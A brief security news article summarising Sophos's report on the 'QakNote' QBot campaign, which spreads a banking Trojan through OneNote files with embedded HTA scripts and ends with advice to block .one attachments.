Security company Sophos has discovered a new QBot campaign dubbed “QakNote,” which uses malicious Microsoft OneNote attachments to infect systems with a banking Trojan.
A new Sophos report says the campaign began on January 31, 2023 and uses OneNote files containing an embedded HTML application (HTA file) that extracts the QBot malware payload. This transition in the QBot distribution was first publicly announced by Cynet researcher Max Malyutin on Twitter on January 31, 2023.
The script in the HTA file uses the legitimate application "curl.exe" to load the Qbot DLL into the "C:\ProgramData" folder and then executes with "Rundll32.exe".
The QBot payload is embedded in the Windows Assistive Technology manager (AtBroker.exe) to hide its presence and avoid detection by antivirus software.
Sophos reports that QBot operators use 2 methods for distributing HTA files: the first is sending emails with an embedded link to the infected ".one" file, and the second is the "stream injection" method.
The thread injection technique is a process where QBot operators hijack existing email threads and send a "reply to all" message to all participants in the thread, attaching a malicious OneNote file to the email as an attachment.
To make these attacks even more deceptive for victims, attackers embed a fake button in a OneNote document that supposedly downloads the document from the cloud, but when clicked, launches an embedded HTA attachment instead. Although after clicking the button, the user will be warned about the risk of launching attachments, there is always a chance that the victim will ignore it.
As a defense against this new attack vector, Sophos suggests that email administrators consider blocking all files with the ".one" extension, as they are not normally sent as attachments.